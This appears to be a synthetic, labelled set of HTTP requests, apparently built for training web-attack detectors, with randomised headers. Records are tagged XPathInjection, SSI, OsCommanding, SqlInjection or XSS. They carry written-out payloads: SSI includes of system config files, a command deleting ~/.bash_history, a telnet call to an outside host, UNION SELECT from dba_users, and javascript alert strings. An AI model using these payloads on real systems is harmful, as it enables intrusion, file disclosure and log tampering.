User-Agent: Mozilla/1.4 (X11; U; Open BSD i386 4.1; he-Fa; rv:8.9.9) Gecko/45125297
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 0.7 204.253.165.17
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: seta/1.0, wmndNp/4.4
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37027
Start - Id: 48872
class: XPathInjection
GET /nIewsnnh0xoswbha/wb0se1o/Iaoio/c6.J4DE/8l/8-JCraFPIP/inV.ZxAaNZbt9A/OTWYlbps.png?tetos0t6Sgt=e&c2tcncaqft=23&sirlgefYsrr=71&H5XJqPyDI=y4smt4s&sni99s8sn=t8trDltif&IyFC3bnetcat=9807401605&shtacolehe02Trg=6+++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++39692%3D&1Ttrsniirm=%2B0eo4mnei+o&hrNiYTudsyi5cpl=%27e%5BgeOsock_streamnoea%2B%2Bty%2Bsh+&stbzsoEaunum=nDswb5+slgt&suntj=lltshutdownthttp HTTP/1.1
Host: www.phhb.st:80
Connection: keep-alive
Accept: application/*;q=0.6, audio/x-wav;q=0.4, audio/x-wav;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 81.197.139.145
Cookie: nhe9lv=<yl's;eeitn=o0o
Cookie2: $Version="488"
Date: Fri, 20 Aug 04 10:25:54 UTC
ETag: "_fRV_D@7oKn-qsK"
Expect: dn6t
From: tT6sz@uCil5yEad.be
If-Modified-Since: Sat, 29 May 04 05:16:03 GMT
If-Unmodified-Since: Tue, 08 Sep 09 04:26:55 UTC
If-Match: "0zapZ_yPZGKOXHkUbo_"
If-None-Match: "RZt2ncEPb9yewnPnIlh"
If-Range: Mon, 30 Oct 06 05:00:55 CET
Max-Forwards: 234
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: Basic aTJoaGxzbmI6ZW51cmxkaQ==
Range: 03033-94733
Referer: /xTue1s/riima.msf
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: tolEsa/5.4.4
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 1.9 30.139.77.167
Transfer-Encoding: compress
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 043440
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48872
Start - Id: 39188
class: SSI
POST /rsKN.cgi? HTTP/1.0
Content-Length: 381
Content-Language: cixab0ib,2t,seahed7
Content-Encoding: identity
Content-Location: http://eenh.uk/eeg1pw5T/srheeOv.pdf
Content-MD5: dHB0ZmllOGhtb2VmdGVraA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 04 03:04:18 GMT
Last-Modified: Sun, 01 Mar 09 02:41:14 CET
Host: www.ttstCott.com
Connection: tlom
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=45208
Client-ip: 240.32.159.203
Cookie: 83riEen=e objectx5imretni;5Qiframef4DjOm=ch1h;ede=nLrK;t7vles0trxn72=ulN@jaQwMbDH
Cookie2: $Version="86"
Date: Mon, 23 Jul 07 13:52:16 CET
ETag: W/"-34z6eXQuW2gPmIxn"
Expect: s2C5
From: nGxh@nraae5E.gov
If-Modified-Since: Mon, 11 Feb 08 19:42:35 GMT
If-Unmodified-Since: Wed, 17 Oct 07 03:28:46 CET
If-Match: "0O28l0PxkqucuFPD"
If-None-Match: "myx5@5BXv41EDrjdqbg"
If-Range: Sun, 04 Jan 04 19:01:59 GMT
Max-Forwards: 899
MIME-Version: 4.8
Pragma: Ht='mcla2swu'
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5
Range: 53710-,-18914,6-
Referer: http://ecldedU.st/bsrswae/ltE0/am6tNo.pl
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.9 (Machintosh; U; PPC 3.2; io-sr; rv:6.4.1) Gecko/76164430
UA-Disp: 631,569,16
UA-Color: color16
UA-Pixels: 466x9263
Via: FTP/4.0 102.30.170.153:3838, 3.4 www.OQnl.shtml
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Serial-Number: 2274804334681
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

teose7f0=758&eeo1eCdoo=<!--#email fromhost="www.dEtcalle.com" tohost="mailbox.qs7.com" message="narhoe e9coexc amoe4Ao lmw" fromaddress="Ua7lrh.com" toaddress="e9b.iFwAu.com" subject="4" sender="umnr.com" replyto="wrdee.com" cc="sve0" inreplyto="ehAt ras dsiIOs" id="Edhemail" -->&ffm3DPjH@V9=dsnoj&odea=356

End - Id: 39188
Start - Id: 35571
class: XPathInjection
PUT /qgatLdf/VA7SkhD/avR6sYv01TuYN@c9.cfm? HTTP/1.1
Content-Length: 358
Content-Language: nsdsa
Content-Encoding: gzip
Content-Location: http://www.lhaas.fr/soszueoh/1Eyhwa/npeef/Fhsb.nsf
Content-MD5: eGtnaGxHb3VkZWxvbGllQw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Jul 06 01:07:47 CET
Last-Modified: Fri, 08 May 09 03:56:33 GMT
Host: 165.177.53.179:4410
Connection: keep-alive
Accept: audio/*, image/jpeg;q=0.9, audio/*;q=0.3
Accept-Encoding: 
Accept-Language: Ensx-e;q=0.8, pfye-vetr;q=0.0, xtymNxE-ntv, odez-hrAys
Cache-Control: only-if-cached
Client-ip: 160.40.149.2
Date: Tue, 27 Nov 07 22:44:07 CET
If-Modified-Since: Mon, 28 May 07 14:36:06 GMT
Authorization: rryt s6Jl=h7naylB
Referer: /sltrcrg.exe
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 4.5; sa-rT; rv:0.3.4) Gecko/82634393
UA-OS: Windows 98
X-Forwarded-For: 64.21.224.193

gyh=cH7wE&dan=082291345&jAlwEr0est3uco=773475&foTTBc.=nsa&oditt=000414&AnT.from-@=vnbdtlesi&psystemVMcR..H5-=it9ea3e7'   or  (i <   count(ebn/child::text())   and j    < count(Yxa/child::comment())  and k  <  count(isticn/child::*)    )  or     '6ylOyee'  = '     Twaoe'    or&aitnx3cfosa1evp=33389

End - Id: 35571
Start - Id: 40537
class: SSI
GET /e1EgeLttEnls/jyTwlvmscEYW/3C9@o_U.html?sEThL=%7Ciaasg&wettits=aln5xea&x8H2LUO=tj9gYtna&mwatt=%3C%21--+%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&eeeWdnlqf78sn9=eick&ppyaehaDipssi7=i4chlib&ueqot=isdez3to HTTP/1.0
Host: www.sachets7a5.uk
Connection: x1qctb
Accept: image/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: tb3anza-eRyzp
Cache-Control: max-age=618
Client-ip: 233.63.57.74
Cookie: guun3=cJLacrYCfPpx;pFNSn4@J8=a73a8axbl;eRrulif4=tjx1TJ084Za;i8=biok1at6e9kTd;IteeB=udRoxmlmeE;ald%aniujag
Cookie2: $Version="326"
Date: Sun, 01 Jul 07 19:24:21 UTC
ETag: "X3kgD5J4q3JmZ9IOwmAz"
Expect: 1sirvmcl=R4nloji;dsonoe=nmaoUt
From: phta9t@exney5i.com
If-Modified-Since: Wed, 30 Nov 05 24:57:04 CET
If-Unmodified-Since: Mon, 19 Sep 05 14:08:46 CET
If-Match: "qV-cYVjAGKbV-yPpeMju"
If-None-Match: *
If-Range: *
Max-Forwards: 6065
MIME-Version: 7.8
Pragma: iar3d4st='Nkioue'
Proxy-Authorization: NTLM OGVMczFpMnRvRWdwYWJwZTZyam5hRXJ0U2xhdW5uSXFjaFRPYWU4bzU=
Authorization: gopleT 27c7o=rerz30S
Range: 5-15061,1-2
Referer: http://www.eiooee.com/eEwn.dll
TE: trailers
Trailer: Referer
User-Agent: Mozilla/3.7 (compatible; MSIE 9.0; WinNT; epRKifd; etiluvicom; koeihhA)
UA-CPU: MIPS
UA-Disp: 5432,6298,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3418x3633
Via: HTTP/9.3 www.ugthb.js, FTP/3.1 190.32.191.7
Transfer-Encoding: deflate
Upgrade: ttRtgh/5.0, upo/8.3, 1a4/1.5, lamere/3.4
Warning: 938 248.40.128.148 "sur0lis0nzeta4oe" "Sun, 25 Apr 04 08:25:21 UTC"
X-Forwarded-For: 70.253.19.118
X-Serial-Number: 61054598804485092045
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40537
Start - Id: 35617
class: XPathInjection
GET /yhjErnqi9knataZ0r/tQme4fctmFFWqHY1a/hdcF3i4RWo0PobQ/dgU4WjKBue/CwherewusrqyA8QhQv/e0atquxhfsT8/Za1FpSpoXietcdusr/xbefirtwaltIN/NtguahaiJne/nkiQB3FCZQdsq0G5/wb0UDQ1.tiff?anat=5544507&s6pkdaf1uLrseit=hdxsn&6slmsy=87250391&rnesreoe=r7Nfje&enprthji1utg=aaacceptko&Nhq6VXX8Mu2htacces=18222&tTtszvcooWt=3eina%2FyniN%2FdEsH%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D+or++++%27hssstyo%27++++%3D+++%27&eleDJomtvf=30978375&sNs=er&sneteed=bie8sbtmeh&i3ddO=6279832562&tr8isej=lb&sxH478e=6&eerso=366&fohr=5443369 HTTP/1.1
Host: www.6qxazzebaa.gov:5
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: ddonh0w=dSrs
Client-ip: 33.82.203.224
Cookie: l1=tttjtdrqakbswt;HxTNRW9IMWo=swc
Cookie2: $Version="923"
Date: Mon, 22 Dec 08 13:39:58 CET
ETag: "yveLgmdxNwRjS_so3"
Expect: ioh3hbt
From: orei@biOfnOuc.com
If-Modified-Since: Thu, 10 Aug 06 09:28:46 CET
If-Unmodified-Since: Wed, 26 Jan 05 08:46:34 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Apr 04 22:46:36 UTC
Max-Forwards: 6902
MIME-Version: 1.3
Pragma: abs='4gy'
Proxy-Authorization: Basic c3l0ZWVBdDI6YU5paXRm
Authorization: Basic aTBvN29mOmpKdXM=
Range: -827333,2893-
Referer: http://mral7t.uk/btis8er/gy6pii/ocso/ykoae7/cH0tyeym.jpg
TE: trailers,gzip,trailers
Trailer: Via
User-Agent: Mozilla/3.7 (Windows; U; Windows NT 9.6; ed-n3; rv:7.6.8) Gecko/11143546
UA-CPU: PowerPC
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: 4.4 www.7bsokueo.html, 6.6 www.ytosl.html
Transfer-Encoding: fese
Upgrade: sivn/3.0
Warning: 510 208.23.212.198:55713 "gsNb3nolnttct" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35617
Start - Id: 39596
class: SSI
GET /8eRhY/sa3S1CU4TKoVZuAuZ/X8k/eWSW7n/we0iBuq29Shm6T/crh4ueilScc97a2ernOu/4eatg/o4sOecarifrhnle/p9Fdocument6ygVvk/yxaw./isCllnophustDqiOcet/eD_2QufDw.dll?dx6ianmgipn=6569909&weibohm=%3C%21--++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E HTTP/1.0
Host: www.sheww.gov
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=55
Client-ip: 239.19.170.214
Cookie: dovdoiht8Ee=fSriAntb3rdee;oes6ur=ople61;tiSe=)as;evMpnepkrP=413eetenithrbast;ainri7ti8op7e=mwhere
Cookie2: $Version="7"
Date: Wed, 17 Nov 04 10:45:32 UTC
ETag: W/"oVLo4-iYAWfQ2T33"
Expect: etree
From: k4wcg@aEdi7a2.de
If-Modified-Since: Thu, 06 Dec 07 03:52:15 UTC
If-Unmodified-Since: Tue, 21 Apr 09 11:36:36 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Apr 05 20:03:53 CET
Max-Forwards: 4441
MIME-Version: 2.2
Pragma: sie=iocfmnJ
Proxy-Authorization: NTLM c3B4Yml0cGFpaWk0YmVscWVpU2h0ZWRybGE3ZWluc3NlamlqbjZkb2Nq
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: /meen.jsp
TE: gzip;q=0.9,deflate;q=0.8
Trailer: Authorization
User-Agent: Mozilla/5.2 (compatible; 1hhd; Open BSD i386; nenheeer; emrtr; Eweswmn)
UA-Disp: 7073,179,8
UA-OS: Win9x
Via: 5.4 www.sery2na.shtml, tnrak/6.5 135.93.162.126, FTP/6.5 www.Oqc5x8uc.gif
Transfer-Encoding: MetdED; a2onthu=n4mae75q
Upgrade: t8veon/3.4, o1M/1.3, ooayr/1.5, edmt/1.1, ecik/3.7
Warning: 019 25.148.254.113 "snoelHUSeyhawd" 
X-Forwarded-For: 216.187.237.43
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39596
Start - Id: 36783
class: OsCommanding
GET /HWQT4.swf?GASYR_y=02283&ny=kncbl%3AatoYeyndt&henos=35&notmgtxt=gZG&xb48tagHt=%27+++++%3B+rm+%7E%2F.bash_history++++%3B&ejeritelps=u3jRons+ HTTP/1.0
Host: 104.223.19.11
Connection: keep-alive
Accept: application/rtf;q=0.9, image/*
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate, compress, gzip;q=0.6, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 183.149.193.186
Cookie: Loas1aB=driej;loYC6SjoprhE=ld.Tj2E
Cookie2: $Version="28"
Date: Sun, 18 Jul 04 16:09:01 CET
ETag: W/"09GvkQ2HrUPf.JiKF"
Expect: tYl5irs
From: hqdnlp@uehby4G.ch
If-Modified-Since: Sun, 29 Jul 07 22:38:32 CET
If-Unmodified-Since: Thu, 19 Jul 07 09:10:19 UTC
If-Match: *
If-None-Match: "XidTsYtibPuSdSM"
If-Range: Fri, 28 Aug 09 09:17:40 UTC
Max-Forwards: 016
MIME-Version: 5.1
Pragma: a2ign=ct
Proxy-Authorization: NTLM NWl0Y25pb3Jha096ZWhmZXBzbmxoZW1LbTdlb25zaDJDdDVubnRib3RuaHNlZg==
Authorization: NTLM b1VobW1vdHRiYWVlbnJiaW5PbnVic3RlcWkxM2x0dHU0ZWRyZ3NqdA==
Range: 907-5,-807
Referer: http://www.rE0nt.uk/oon2eton.dll
TE: trailers,gzip;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/4.5 (X11; U; Linux i586 2.5; rn-nT; rv:7.1.5) Gecko/18555087
UA-CPU: MIPS
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/9.8 212.141.128.165, 0.0 www.rtqny.html
Transfer-Encoding: gzip
Upgrade: lNc/6.5, 7nli6/7.0
Warning: 069 241.153.203.196 "ds96bdaie" "Mon, 05 May 08 12:27:37 UTC"
X-Forwarded-For: 5.176.183.129
X-Serial-Number: 51873709956197
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36783
Start - Id: 35314
class: SqlInjection
GET /r7TRFvJGw2v5/gelCXXEiRb5/sNL6NvRe@@BoVprH-tLE/nhcphlEruw8pmIiac1en/mxvbscriptJkstdinAFTn-WbH/imBZ-Ew7dPey/window.openJb-8mC/ayig/ayutionba6hamvInygsf/Rgz6sM/3R_krid/lEClOBvO0.mn7YlF.jpg?Uj6I=%27+++OR++%27ime6du3NeeGsohu%27++%3D++%27++ HTTP/1.0
Host: www.edoni.ch
Connection: keep-alive
Accept: video/mpeg;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 94.110.74.242
Cookie: iakhtoEi=r ;er=eee
Cookie2: $Version="1"
Date: Mon, 15 Mar 04 22:23:27 CET
ETag: "@IHp0044BDAN5pIZOPDV"
Expect: 100-continue
From: Nlnin@tbpee7c5t.it
If-Modified-Since: Tue, 07 Dec 04 24:46:21 UTC
If-Unmodified-Since: Mon, 21 Jan 08 04:45:39 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 14 Feb 06 12:56:53 GMT
Max-Forwards: 54
MIME-Version: 8.1
Pragma: ea=wijkt
Proxy-Authorization: saoa Iaepe=rennc
Authorization: Uenih neueoni=lewhi
Range: 414018-,3-
Referer: /eAsSh/eaurau/Owsucfai.php
TE: trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/0.0 (X11; U; Open BSD i586 1.9; i6-sn; rv:4.0.4) Gecko/90816932
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 198x9357
Via: 6.6 www.sgTtit.gif
Transfer-Encoding: identity
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 550 www.eCnTyemt.tiff "ton0otomapoagQte" "Fri, 16 Feb 07 04:04:17 CET"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 37310092312923
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35314
Start - Id: 47702
class: XSS
GET /rzsf/erotaio2taHnle/nelfcyJi/m5/q_kE_wnQt1QziG8n0sW/h6lGqeR7WZ5YX6KmU/pZinIT/8gmZcs.ldN@UhG/fPmailu9.mspx?5drlh7ss=dpRra&ryU0bVYf5EAelcn=443037727&oa=17&saIeuchymgz=1838&CjE-0FY1=ooeehli&k3L7adminmhNVMB0=t-&o5fmcrabys6=2hh1e&n8emn=javascript%3A++alert+++%28+++++%22+s8.9%22%29&hdlnLo=01430&3ahegade=738&TvwRuYS=318&l8iaesh=aeedh80Dyp&ejhetttnuaghs7=4&ibnryereeg=sdaneOhaSOry%7Ee HTTP/1.1
Host: www.iaftttn.net
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: compress;q=0.0, deflate, deflate, deflate
Accept-Language: *
Cache-Control: max-stale=82038
Client-ip: 29.159.169.244
Cookie: atnrrc=e;2tU@3=ssl4evalx~Yn;eiarteademlod=awSE3_AVssZ;orkspssasqca=q4KKrylZ@p;roorat9C7dcDnSi=9545077
Cookie2: $Version="6"
Date: Sun, 08 May 05 13:29:17 GMT
ETag: W/"XsttvGY924rMZZs4W"
Expect: ps4sdN
From: ntca1@4fmcsegl.gov
If-Modified-Since: Tue, 11 Nov 08 24:03:33 UTC
If-Unmodified-Since: Wed, 17 Aug 05 03:55:41 CET
If-Match: *
If-None-Match: "PrgIUeicm9SP4_DJZqA"
If-Range: "TJ.ap@zM@jj2rOoKhHxK"
Max-Forwards: 93
MIME-Version: 9.8
Pragma: Imban=eushhyi
Proxy-Authorization: NTLM b3Q2OWN3aXJkc2xycmhyaGVldGRpYXg0c2llZHR1bmhqdEdvZnNoZWhy
Authorization: Basic cmx0MjpyOWU3cw==
Range: 37-9480,573294-46248,0850-768
Referer: /aHtewfa/rharcere/mAwnm.jsp
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/0.2 (compatible; MSIE 3.2; Open BSD i586; 5yy4tAc)
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: identity
Upgrade: 4Siht/2.2
Warning: 681 105.145.39.255 "iAonrneh" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 00056552698
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47702
Start - Id: 43409
class: OsCommanding
GET /swqkwoiRmrd9tiaoI/dpejKe/1sAnetcat/KlocationW3yG/aDhhostnbhesSR5pg/Up9wj/ewzD2o0C-v5uD0fUQ/Z5@k/sAW.XpitegVBgeRNQsxr.mspx?onyz=%5C%22+++%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+++www.ndrastna.com+1185%3B HTTP/1.0
Host: 219.49.110.57
Connection: xh26t
Accept: */*;q=0.6
Accept-Charset: x-mac-hebrew;q=0.7, euc-cn, x-mac-arabic;q=0.2, x-mac-greek
Accept-Encoding: *;q=0.9
Accept-Language: tLDooin-dia;q=0.7, 6agaroS-w;q=0.7
Cache-Control: max-stale=57
Client-ip: 232.231.66.96
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Thu, 13 Apr 06 06:13:47 GMT
ETag: W/"-jNaB3iCGV2XS5lR0"
Expect: hWd4dMn
From: fikl0E@tRser.fr
If-Modified-Since: Mon, 06 Dec 04 17:27:52 CET
If-Unmodified-Since: Sun, 07 Mar 10 13:33:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 792
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Basic c2g4ZzROaXA6bnBnZWQwcHU=
Range: 6-,47-768842,6146-09
Referer: /sRtprr.bin
TE: trailers,gzip
Trailer: If-Range
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 4.0; fp-oa; rv:6.1.2) Gecko/28391463
UA-CPU: 68000
UA-Disp: 9885,5189,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9788x122
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: lHt9tr
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43409
Start - Id: 41734
class: SqlInjection
GET /rmxTytboot.iniYHcQbhxO.exe?it=5n%25qdohavingbezvara&eawlejamodjaeu=c%3D+%25uitcmdtcrsxmle&NN0G@HvuGtQ=6&prVNxaw=16928249&Jwindow.opentmpjtmVkNZ=84&4lsu=odcEash9hc&b4zksSB.8_=OR++%27Gs%27+++%3D+++++N%27+++++%27&oknna=d7o&NPWtmp9uZ=3%28tsyEnaisEz%26a&ls=tcnhisstt3at&jeeecSsitimp=hCAXejyNC&Ldocumentwand28I_p4=n HTTP/1.0
Host: 250.57.226.250
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, x-mac-korean;q=0.3, windows-1255, x-mac-cyrillic
Accept-Encoding: identity, deflate, gzip;q=0.5, identity
Accept-Language: *;q=0.1
Cache-Control: max-stale=103
Client-ip: 136.31.14.94
Cookie: 9L-8y=94247939
Cookie2: $Version="023"
Date: Thu, 19 May 05 09:59:03 CET
ETag: ".8@GDRHyIA4apu-uhu"
Expect: 100-continue
From: tn3rs6or@Itnftdpo.biz
If-Modified-Since: Thu, 10 Jul 08 20:51:12 UTC
If-Unmodified-Since: Fri, 21 Mar 08 20:39:17 CET
If-Match: "6pOxRaB8KDXd1SARmDa"
If-None-Match: *
If-Range: "l@zlvyPiyamtfnCLEf6"
Max-Forwards: 073
MIME-Version: 5.7
Pragma: luamuo=xo
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic aW9lczphdDlicg==
Range: -9158,6593-962,-115779
Referer: /almoysos/uyhsg/mEsk/piaqhmt.jpeg
TE: trailers,trailers
Trailer: Trailer
User-Agent: aeseasfhen (oOMqVF-.Wa)
UA-CPU: Sparc
UA-Disp: 533,6900,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3172x1738
Via: 6.5 252.88.22.86, 57y/6.6 149.222.165.7, 9.5 www.4ztet.jpg:9432
Transfer-Encoding: compress
Upgrade: kmeyp7/6.4, oab/2.7, peZa/7.9, tihsau/8.6, rstvvt/0.5
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41734
Start - Id: 35081
class: SqlInjection
GET /reinrnsl2t/acceptlPvPuv6/shc7ne/leoP4l4rnTrC/eznhe8nak8opgeascent/aeQkxX9eDW.B.png?ysnni=4146890&ekqr=35&fcTc=tNUXShn9rmpJ&_6havingdgyA=y4&lupnELwhocIn=Etrqtsomochaidvbscriptoe%5Der++xonode&h7oidufllo7l=srlp&neyektew2c=inoaa%7Eeei&sjni=vt&tx=a0ddiv6daop+t3i7scriptpnrr&ir8cbeeli=OsE9fohefeey&kt4gsta=td3vnHhH&YKXrm=ehgd&ndn=+7%7C HTTP/1.1
Host: 26.66.12.99
Connection: close
Accept: text/*, text/xml;q=0.7, text/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: ahhsL' UNION     /**/    SELECT   nv8h   FROM  dba_users  WHERE  9afsi   like    '%25
Accept-Language: l-ts;q=0.9, tt8-n, s-alc3;q=0.2, aqveoivr-8td;q=0.0, uolba-ArBoew4t
Cache-Control: max-age=6205
Client-ip: 111.16.114.207
Cookie: Ndtg9heloSpk=log:e h;desnV4bt=imychx
Cookie2: $Version="329"
Date: Sun, 24 Apr 05 06:38:16 CET
ETag: "eBZUEjTAz_wbc-ISX"
Expect: png7e
From: Icdw@di9ssorE6e.com
If-Modified-Since: Mon, 31 Jan 05 11:59:10 UTC
If-Unmodified-Since: Thu, 02 Oct 08 06:45:35 UTC
If-Match: "GCA@Xsb@fcoVNjNzXsr"
If-None-Match: "OOCs16b1Z_HEiZd-gtn"
If-Range: "BxvziXyUxiR3lzRXb"
Max-Forwards: 651
MIME-Version: 0.2
Pragma: no-cache
Authorization: Digest nc=fb5F43EE
Range: 403-
Referer: http://www.hsa0oE.fr/kdtttslj/ssAl/iStOyen/stqpe.cfm
TE: chunked;q=0.6
Trailer: Referer
User-Agent: l1XShy302e http://www.4tm7.ch
UA-CPU: MIPS
UA-Disp: 7830,290,16
UA-OS: Linux
UA-Pixels: 7093x359
Via: HTTP/6.7 97.127.212.27, HTTP/4.2 249.241.159.205, harTe/6.2 www.to7iwl.css
Transfer-Encoding: deflate
Warning: 833 www.analD.tiff "ooresNgsd1nroHr" 
X-Serial-Number: 51475
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35081
Start - Id: 46802
class: XSS
PUT /kxs9/nFL_LS_a_9gWLiWXL/documentMseWe8.-@.jpg? HTTP/1.0
Content-Length: 314
Content-Language: Innrgt,Tcavrnlo
Content-Encoding: deflate
Content-Location: http://eaoda.com/kenEa/suoet/nwrtId.gz
Content-MD5: cGZhb3hvcnRyMnRsdHR1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Oct 04 03:06:46 UTC
Last-Modified: Fri, 19 Feb 10 24:40:55 GMT
Host: 165.37.228.235
Connection: close
Accept: audio/basic, image/*, audio/*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: iiNko-badb, asiwsAS-A4
Cache-Control: no-transform
Client-ip: 163.182.220.152
Cookie: r.JBkz1_G-Q=o.lVYEW;O7LlWR=rorrOnt;d6e=%
Cookie2: $Version="55"
Date: Mon, 04 Jan 10 16:55:35 GMT
ETag: "zdWaUN_28hOSe2q66Mv"
Expect: 100-continue
From: he2rmeQu@ialstesjs.st
If-Modified-Since: Sun, 25 Dec 05 08:20:21 UTC
If-Unmodified-Since: Sun, 27 Mar 05 18:10:36 GMT
If-Match: "kHLu8mdc4Sini@16xaQ"
If-None-Match: *
If-Range: Tue, 20 Dec 05 19:10:32 GMT
Max-Forwards: 3805
MIME-Version: 2.3
Pragma: NrEoA='tmgo'
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: pHir errlaW5a=wzth
Range: 15-86
Referer: http://Re0nn.biz/awgSiaa/naigihht/ddai.ace
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: 8sdftdo6 (eVMOqvaj; eHllsQcA_; emqD-8BU)
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.5 64.74.41.231, FTP/3.7 www.erecoa.htm, coli/5.6 185.118.118.60
Transfer-Encoding: compress
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
